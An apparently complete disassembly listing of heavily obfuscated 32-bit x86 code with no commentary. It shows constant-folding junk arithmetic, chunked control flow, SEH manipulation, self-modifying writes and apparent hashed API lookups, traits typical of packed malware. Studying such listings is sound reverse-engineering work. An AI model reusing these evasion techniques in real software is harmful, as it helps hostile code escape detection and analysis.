; FUNCTION CHUNK AT 0042CB8C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042D328 SIZE 0000000B BYTES
push eax
mov [esp+0], ebp
mov ebp, esp
push 0AAF480Eh
jmp loc_42532C
sub_42D9A4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jz loc_4286ED
push offset sub_4286E4
jmp locret_429330
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42D9C8: ; CODE XREF: _0182ofla:loc_4292D5�j
; sub_425B00+4C7C�j
sub eax, [ebp-28h]
mov [ebp-24h], eax
mov eax, [ebp-24h]
mov esp, ebp
pop ebp
jmp nullsub_149
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
xchg esi, [ebx]
jmp sub_42EB4E
; ---------------------------------------------------------------------------
loc_42D9E0: ; DATA XREF: sub_428EB9+1DB6�o
mov [edx-8], eax
jmp loc_42EC2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42D9E8: ; CODE XREF: sub_428EB9+1DA1�j
cmp dword ptr [ebp-10h], 2
jnz loc_428363
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_42DD43
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_42D9FE: ; CODE XREF: sub_42349B+8�j
; _0182ofla:0042B7A7�j
cmp dword ptr [ebp-1Ch], 67h
jnz loc_42EABE
jmp loc_42A3EC
; END OF FUNCTION CHUNK FOR sub_42349B
; =============== S U B R O U T I N E =======================================
sub_42DA0D proc near ; DATA XREF: _0182ofla:00429262�o
push 0CCFB62A0h
sub_42DA0D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42DA12: ; CODE XREF: sub_423FCD-777�j
pop edx
sub edx, 7CA3BD7Eh
or edx, 150EC72h
add edx, 0AEEAF175h
xchg edx, [esp+0]
jmp sub_423FCD
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_42DA2D proc near ; CODE XREF: sub_4286C8:loc_4286CF�p
; _0182ofla:0042E4F6�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00425941 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042625A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004268AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042939D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042C4CE SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push eax
mov eax, [ebp-18h]
add eax, eax
cdq
jmp loc_42C4CE
sub_42DA2D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42DA3D: ; CODE XREF: sub_425DA5:loc_4248F3�j
jnz loc_42CF61
jmp loc_42E419
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42DA48: ; CODE XREF: sub_42798F+2421�j
add ecx, 9Ch
add [ecx], al
add ecx, 4
mov dword ptr [ecx], offset loc_423C65
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_42DA60: ; CODE XREF: _0182ofla:00426792�j
jmp loc_42A487
; =============== S U B R O U T I N E =======================================
sub_42DA65 proc near ; CODE XREF: sub_427F32+452�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00426431 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004267D2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00426D5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A448 SIZE 0000000B BYTES
push dword ptr fs:0
jmp loc_42A448
sub_42DA65 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42DA71: ; CODE XREF: _0182ofla:004252C4�j
jmp loc_429E4C
; ---------------------------------------------------------------------------
loc_42DA76: ; CODE XREF: _0182ofla:loc_427C92�j
add dword ptr [esp], 0E7238C12h
push edx
push 0BFB2DA8Eh
pop edx
rol edx, 0Eh
jmp loc_42649C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6BF
loc_42DA8C: ; CODE XREF: sub_42E6BF-13C6�j
; sub_42E6BF:loc_42E00F�j
call sub_42DA9C
retn
; END OF FUNCTION CHUNK FOR sub_42E6BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_42DA92: ; CODE XREF: sub_4289E4+3928�j
jmp loc_42C286
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D15D
loc_42DA97: ; CODE XREF: sub_42D15D-3C0C�j
jmp loc_426537
; END OF FUNCTION CHUNK FOR sub_42D15D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DA9C proc near ; CODE XREF: sub_42E6BF:loc_42DA8C�p
push ebp
mov ebp, esp
jmp sub_42C89F
sub_42DA9C endp
; ---------------------------------------------------------------------------
loc_42DAA4: ; CODE XREF: _0182ofla:loc_426817�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
add ecx, 18h
mov al, [ecx]
add ecx, 9Ch
jmp loc_429F87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42DAC7: ; CODE XREF: sub_42798F+F69�j
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jmp loc_427AEC
; ---------------------------------------------------------------------------
loc_42DAD3: ; CODE XREF: sub_42798F:loc_429D23�j
cmp byte ptr [ebp-5], 0
jnz loc_426069
call sub_4247FE
test eax, eax
jz loc_426069
jmp loc_426DD0
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
mov edx, 9278ADE5h
call sub_42D71D
push offset loc_42DDFE
jmp locret_42D1C3
; ---------------------------------------------------------------------------
loc_42DB03: ; DATA XREF: sub_423395+49D8�o
push 0
push 10h
push 713FF3A5h
pop eax
xor eax, 2E9A55F4h
add eax, ebp
jmp loc_423841
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABB7
loc_42DB1A: ; CODE XREF: sub_42ABB7+1�j
mov ebp, esp
push ecx
mov byte ptr [ebp-1], 0
mov eax, cs
jmp loc_42D046
; END OF FUNCTION CHUNK FOR sub_42ABB7
; ---------------------------------------------------------------------------
loc_42DB28: ; CODE XREF: _0182ofla:0042771A�j
jo loc_425A32
; =============== S U B R O U T I N E =======================================
sub_42DB2E proc near ; CODE XREF: sub_42349B+604�p
; sub_425BF8:loc_429F11�j
; FUNCTION CHUNK AT 00424374 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428458 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042981C SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
loc_42DB32: ; CODE XREF: sub_425DA5:loc_42B56F�j
push 0D7426A9Bh
pop eax
sub eax, 6F1DFA07h
jns loc_428458
loc_42DB44: ; CODE XREF: sub_42609B+3�j
jmp sub_42926C
sub_42DB2E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427906
loc_42DB49: ; CODE XREF: sub_427906:loc_42AF57�j
push esi
push 2A683C75h
pop esi
loc_42DB50: ; CODE XREF: sub_429038-5959�j
xor esi, 26AED336h
add esi, 0F33910C1h
call sub_428A39
loc_42DB61: ; CODE XREF: sub_42349B+987B�j
jmp loc_42E2C5
; END OF FUNCTION CHUNK FOR sub_427906
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42DB66: ; CODE XREF: sub_428D63:loc_42DD25�j
jz loc_42B115
jmp loc_42E184
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
loc_42DB71: ; DATA XREF: sub_428041-24A4�o
sbb edx, ebx
pop ebx
call sub_4267E7
jmp loc_42CF08
; ---------------------------------------------------------------------------
loc_42DB7E: ; DATA XREF: sub_42561D:loc_42503E�o
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42DB84: ; CODE XREF: sub_423A2A:loc_42E557�j
jnz loc_42AAB3
mov eax, [ebp-8]
shl eax, 3
add [ebp-8], eax
jmp loc_42323F
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4252A2
loc_42DB98: ; CODE XREF: sub_4252A2+17�j
mov [edi], eax
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_4252A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_42DB9C: ; CODE XREF: sub_42DD86-925F�j
; sub_42D833-64FB�j
rol eax, 18h
jmp loc_4294A5
; END OF FUNCTION CHUNK FOR sub_42D833
; ---------------------------------------------------------------------------
jge loc_4258A1
mov [edx], esi
jmp sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42DBB1: ; CODE XREF: sub_426571:loc_42D158�j
mov eax, [ebp-4]
inc eax
; END OF FUNCTION CHUNK FOR sub_426571
; START OF FUNCTION CHUNK FOR sub_426240
loc_42DBB5: ; CODE XREF: sub_426240+8�j
mov eax, [eax]
add eax, [ebp-4]
add eax, 5
cmp eax, ds:dword_42B8EC
push offset loc_423C04
jmp sub_427503
; END OF FUNCTION CHUNK FOR sub_426240
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424BCB
loc_42DBCD: ; CODE XREF: sub_424BCB+1F6C�j
jnz loc_4299F7
jmp loc_427A68
; END OF FUNCTION CHUNK FOR sub_424BCB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427762
loc_42DBD8: ; CODE XREF: sub_427762+14�j
or [ecx+edx], al
mov ecx, [ebp-20h]
push eax
push offset loc_4274B0
jmp loc_42A2DB
; END OF FUNCTION CHUNK FOR sub_427762
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_42DBE9: ; CODE XREF: sub_42E218:loc_423691�j
test ebx, ecx
jmp loc_42C841
; END OF FUNCTION CHUNK FOR sub_42E218
; =============== S U B R O U T I N E =======================================
sub_42DBF0 proc near ; CODE XREF: sub_423057+E�p
; _0182ofla:00423E06�p ...
; FUNCTION CHUNK AT 0042680D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427EBE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428D9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CA5C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D379 SIZE 00000005 BYTES
js sub_42CA66
push ebp
mov ebp, esp
push ecx
cmp ds:dword_427A20, 0
jz loc_426F91
jmp loc_42680D
sub_42DBF0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A93
loc_42DC0C: ; CODE XREF: sub_425A93:loc_42A4B6�j
mov edx, 0B9726E5Ah
call sub_42D71D
push eax
ror eax, 15h
jmp loc_4269C0
; END OF FUNCTION CHUNK FOR sub_425A93
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DC1F proc near ; CODE XREF: sub_425305�j
; FUNCTION CHUNK AT 004275B8 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_4275B8
sub_42DC1F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D52E
loc_42DC28: ; CODE XREF: sub_42D52E-6E4C�j
jmp loc_4259F9
; END OF FUNCTION CHUNK FOR sub_42D52E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CA66
loc_42DC2D: ; CODE XREF: sub_42CA66+11�j
mov eax, ds:dword_427A20
mov eax, [eax]
mov ds:dword_427A24, eax
xor eax, eax
jmp loc_428980
; END OF FUNCTION CHUNK FOR sub_42CA66
; ---------------------------------------------------------------------------
loc_42DC40: ; CODE XREF: _0182ofla:loc_427627�j
; DATA XREF: sub_424184+524F�o
mov edx, 0F9A79DECh
call sub_42D71D
push eax
ror eax, 7
mov ds:dword_42D24C, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC34
loc_42DC55: ; CODE XREF: sub_42CC34+A�j
jmp loc_4255F9
; END OF FUNCTION CHUNK FOR sub_42CC34
; ---------------------------------------------------------------------------
loc_42DC5A: ; CODE XREF: _0182ofla:0042A56F�j
jmp locret_42D289
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425048
loc_42DC5F: ; CODE XREF: sub_425048+C�j
jmp loc_42522E
; END OF FUNCTION CHUNK FOR sub_425048
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D33D
loc_42DC64: ; CODE XREF: sub_42D33D+14�j
rol eax, 7
push offset sub_428BEB
jmp nullsub_152
; END OF FUNCTION CHUNK FOR sub_42D33D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_42DC71: ; CODE XREF: sub_428041:loc_429D40�j
mov eax, [ebp+8]
push eax
push esi
loc_42DC76: ; CODE XREF: _0182ofla:00428C90�j
push 961F8FC7h
pop esi
xor esi, 7A23CA44h
rol esi, 15h
add esi, 4FC4D978h
jmp loc_42AB1E
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42DC90: ; CODE XREF: sub_423FCD:loc_42A0A7�j
; sub_423FCD+901F�j
push edi
push 0CAB0B607h
pop edi
sub edi, 0CDFC11Ch
xor edi, 0BDD0F4EBh
xchg edi, [esp-4+arg_0]
push eax
jmp loc_42C63B
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428110
loc_42DCAC: ; CODE XREF: sub_428110+46C5�j
jb loc_423EC4
loc_42DCB2: ; CODE XREF: sub_428110:loc_425903�j
push offset sub_42E6CF
jmp nullsub_241
; END OF FUNCTION CHUNK FOR sub_428110
; ---------------------------------------------------------------------------
loc_42DCBC: ; CODE XREF: _0182ofla:00427555�j
sub edi, esi
mov [esi], ebp
jmp loc_424F89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_162. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_42DCC6: ; CODE XREF: _0182ofla:loc_4270DF�j
; sub_4267F8+7892�j
mov eax, [ebp-4]
mov al, [eax]
mov [ebp-9], al
mov al, [ebp-0Ah]
and al, 7
jmp loc_4273CF
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42DCD8: ; CODE XREF: sub_42B15E:loc_423533�j
add edi, 66AC1755h
jmp sub_42768C
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
loc_42DCE3: ; CODE XREF: _0182ofla:loc_42A088�j
pop edx
xor edx, ds:4000FAh
and edx, 8B6BAF95h
jnz loc_4240B1
; START OF FUNCTION CHUNK FOR sub_4286A8
loc_42DCF6: ; CODE XREF: sub_4286A8+D�j
jmp loc_425485
; END OF FUNCTION CHUNK FOR sub_4286A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A181
loc_42DCFB: ; CODE XREF: sub_42A181-4773�j
jmp loc_427730
; END OF FUNCTION CHUNK FOR sub_42A181
; ---------------------------------------------------------------------------
mov edx, [ecx]
rol esi, 5
cmp eax, 0D84F5C23h
jmp loc_4240AB
; ---------------------------------------------------------------------------
loc_42DD10: ; CODE XREF: _0182ofla:0042958A�j
rol edi, 0Dh
xchg ebx, edi
jmp loc_426960
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427906
loc_42DD1A: ; CODE XREF: sub_427906:loc_423CB3�j
mov [ebx], edx
mov ebx, offset sub_42469C
xchg ebx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_427906
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42DD25: ; CODE XREF: sub_428D63+137C�j
jmp loc_42DB66
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_42DD2A proc near ; DATA XREF: sub_42798F+26D6�o
; FUNCTION CHUNK AT 00425D0E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004286BA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042D78F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042E0D1 SIZE 00000005 BYTES
movzx edx, byte ptr [ecx+edx]
and eax, edx
jz loc_42620C
jmp loc_42E0D1
sub_42DD2A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_42DD3B: ; CODE XREF: sub_427259+5E2E�j
popf
xchg ecx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
xor eax, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_42DD43: ; CODE XREF: sub_428EB9+4B40�j
jmp loc_428363
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D70E
loc_42DD48: ; CODE XREF: sub_42D70E+9�j
jmp loc_426403
; END OF FUNCTION CHUNK FOR sub_42D70E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_42DD4D: ; CODE XREF: _0182ofla:00424423�j
; _0182ofla:loc_425CFF�j ...
pop large dword ptr fs:0
add esp, 4
jmp loc_425E6B
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42DD5C: ; CODE XREF: sub_428D63:loc_428423�j
mov [ebp-4], eax
jmp loc_42A53E
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_42DD64: ; CODE XREF: sub_423F50:loc_42D581�j
lea eax, [ebp-125h]
push eax
call sub_42DBF0
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jmp loc_424447
; END OF FUNCTION CHUNK FOR sub_423F50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427802
loc_42DD7C: ; CODE XREF: sub_427802+5FFC�j
xchg eax, [esp+4+var_4]
jmp loc_42713F
; END OF FUNCTION CHUNK FOR sub_427802
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42DD84: ; CODE XREF: sub_428F20-4A3C�j
xor esi, eax
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
sub_42DD86 proc near ; CODE XREF: sub_42D833-1DB�p
; FUNCTION CHUNK AT 00424B25 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004293B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AA29 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_42D124
jmp loc_424B25
sub_42DD86 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jbe loc_42B09D
jmp loc_42968A
; ---------------------------------------------------------------------------
loc_42DDA4: ; CODE XREF: _0182ofla:0042E8A4�j
not ebp
; =============== S U B R O U T I N E =======================================
sub_42DDA6 proc near ; CODE XREF: sub_425B6E+5CE2�p
; FUNCTION CHUNK AT 00426126 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042801D SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
lea edx, [eax+20h]
jmp loc_426126
sub_42DDA6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423114
loc_42DDB2: ; CODE XREF: sub_423114:loc_423D3E�j
; sub_423114+34DF�j
call nullsub_197
retn
; END OF FUNCTION CHUNK FOR sub_423114
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_197. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423114
loc_42DDB9: ; CODE XREF: sub_423114+7�j
call sub_423FCD
jmp loc_42E6CA
; END OF FUNCTION CHUNK FOR sub_423114
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272F4
loc_42DDC3: ; CODE XREF: sub_4272F4+5B32�j
push 0
push offset loc_42799E
jmp nullsub_154
; END OF FUNCTION CHUNK FOR sub_4272F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_42DDCF: ; CODE XREF: sub_42C553-7BD3�j
not ebx
or edx, 92BBF36h
adc esi, edx
loc_42DDD9: ; CODE XREF: sub_42C553-7BDB�j
add ecx, 6A0C3B52h
add ecx, ebp
add ecx, 0AC03C6D4h
mov [ecx], eax
loc_42DDE9: ; CODE XREF: _0182ofla:loc_4238F3�j
jmp loc_42AFDA
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
loc_42DDEE: ; DATA XREF: sub_426E44-1EC5�o
mov eax, [ebp-14h]
mov [ebp-0Ch], eax
push offset sub_428899
jmp locret_42523B
; ---------------------------------------------------------------------------
loc_42DDFE: ; DATA XREF: _0182ofla:0042DAF9�o
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_427F10
call sub_427C4D
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42DE10: ; CODE XREF: sub_428D63+CFC�j
jmp loc_42841D
; END OF FUNCTION CHUNK FOR sub_428D63
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_228. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_42DE16: ; CODE XREF: sub_423FE2+6694�j
jmp loc_429CE4
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42DE1B: ; CODE XREF: sub_42D056-69D0�j
ror esi, 1
loc_42DE1D: ; CODE XREF: sub_42D056:loc_428676�j
call sub_42ECFA
lea eax, sub_42AE82
mov [ebp-4], eax
call sub_427259
push offset sub_428336
jmp nullsub_156
; END OF FUNCTION CHUNK FOR sub_42D056
; =============== S U B R O U T I N E =======================================
sub_42DE3A proc near ; CODE XREF: _0182ofla:0042525A�p
; _0182ofla:00429A86�j
; FUNCTION CHUNK AT 00424C41 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428E1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C6C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C78A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E0D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E34B SIZE 00000011 BYTES
mov [esp+0], eax
pop eax
mov dword ptr [ebp-4], 1
push 0F97604E7h
pop eax
add eax, 689FB19h
or eax, eax
jz loc_42A79E
jmp loc_42C78A
sub_42DE3A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42DE5E: ; CODE XREF: sub_428D63:loc_42862F�j
jz loc_42CC6F
; END OF FUNCTION CHUNK FOR sub_428D63
; START OF FUNCTION CHUNK FOR sub_425499
loc_42DE64: ; CODE XREF: sub_425499+D�j
jmp loc_42741A
; END OF FUNCTION CHUNK FOR sub_425499
; ---------------------------------------------------------------------------
pushf
jle loc_423008
and ecx, 0C02BD3CFh
sbb ebp, esi
jmp loc_42CC6F
; ---------------------------------------------------------------------------
test eax, eax
jl loc_426069
jmp loc_42AA81
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4C6
loc_42DE8A: ; CODE XREF: sub_42A4C6-51D5�j
push 0CAE3CB80h
sub [esp+8+var_8], 1AE3D3BBh
push edi
pushf
push 20052433h
pop edi
loc_42DE9E: ; CODE XREF: _0182ofla:004275CD�j
and edi, 75DC39EFh
add edi, 0DFFBDFDFh
jmp loc_42CFC7
; END OF FUNCTION CHUNK FOR sub_42A4C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42DEB0: ; CODE XREF: _0182ofla:0042C3B6�j
jmp loc_42E959
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42DEB5: ; CODE XREF: sub_428A39+1C65�j
jmp nullsub_157
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_42DEBA: ; CODE XREF: sub_4295D6-FAD�j
jmp loc_423799
; END OF FUNCTION CHUNK FOR sub_4295D6
; =============== S U B R O U T I N E =======================================
sub_42DEBF proc near ; CODE XREF: sub_42D81E�p
push large dword ptr fs:0
mov large fs:0, esp
mov eax, [eax]
mov eax, 1
jmp loc_425FF4
sub_42DEBF endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add eax, offset nullsub_9
mov byte ptr [eax], 0C3h
jmp loc_428820
; ---------------------------------------------------------------------------
test al, al
jz loc_42DEFF
call sub_42E2EE
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42DEF5: ; CODE XREF: sub_42B15E+225B�j
jmp loc_42D68A
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42DEFA: ; CODE XREF: sub_428D63:loc_426216�j
jmp loc_4263C4
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
loc_42DEFF: ; CODE XREF: _0182ofla:0042DEE9�j
call sub_42C718
jmp loc_429AF4
; ---------------------------------------------------------------------------
loc_42DF09: ; DATA XREF: sub_427D2B+7�o
dec dword ptr [ebp-18h]
jnz loc_425C11
jmp loc_428132
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1DA
loc_42DF17: ; CODE XREF: sub_42E1DA:loc_42B2F5�j
xchg eax, [esp-8+arg_4]
mov ebx, eax
pop eax
pop ecx
jmp loc_428DB2
; END OF FUNCTION CHUNK FOR sub_42E1DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273AD
loc_42DF23: ; CODE XREF: sub_4273AD+3�j
add eax, edx
; END OF FUNCTION CHUNK FOR sub_4273AD
; START OF FUNCTION CHUNK FOR sub_423AF2
loc_42DF25: ; CODE XREF: sub_423AF2:loc_4265F8�j
mov eax, 1B078F84h
cmp edx, ecx
call sub_42CD44
loc_42DF31: ; DATA XREF: sub_423F73+6�o
mov esp, ebp
mov ebp, offset sub_42DF41
loc_42DF38: ; CODE XREF: _0182ofla:loc_42A758�j
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_423AF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3C2
loc_42DF3C: ; CODE XREF: sub_42B3C2-1531�j
jmp loc_4233B0
; END OF FUNCTION CHUNK FOR sub_42B3C2
; =============== S U B R O U T I N E =======================================
sub_42DF41 proc near ; DATA XREF: sub_423AF2+A441�o
; FUNCTION CHUNK AT 004254E7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00425B5B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004262FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428995 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0042AF61 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042D45A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E2A4 SIZE 00000005 BYTES
mov eax, ds:dword_42D104
or eax, eax
jnz loc_428995
jmp loc_4262FC
sub_42DF41 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42DF54: ; CODE XREF: sub_42798F+D4�j
mov [ebp-1Ch], eax
push offset sub_4284E7
loc_42DF5C: ; CODE XREF: _0182ofla:loc_426AF5�j
jmp loc_424C70
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_42DF61 proc near ; CODE XREF: _0182ofla:00429620�j
; _0182ofla:loc_42A116�p
mov [esp+0], eax
pop eax
push ebp
call sub_42A0B2
loc_42DF6B: ; DATA XREF: sub_428A39:loc_42C2A4�o
mov edx, 0BE8CE1B7h
call sub_42D71D
mov [ebp-4], eax
call sub_42537E
not esi
jmp sub_426319
sub_42DF61 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E35C
loc_42DF84: ; CODE XREF: sub_42E35C+7�j
push esi
push 34AA8C20h
pop esi
and esi, 0CF5A7AC4h
add esi, 0FC38336Eh
loc_42DF97: ; CODE XREF: _0182ofla:00428DA8�j
jmp loc_423B66
; END OF FUNCTION CHUNK FOR sub_42E35C
; ---------------------------------------------------------------------------
loc_42DF9C: ; DATA XREF: sub_42DFFB:loc_42E005�o
jnb loc_425BBD
mov eax, ds:dword_423190
mov edx, [ebp-4]
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
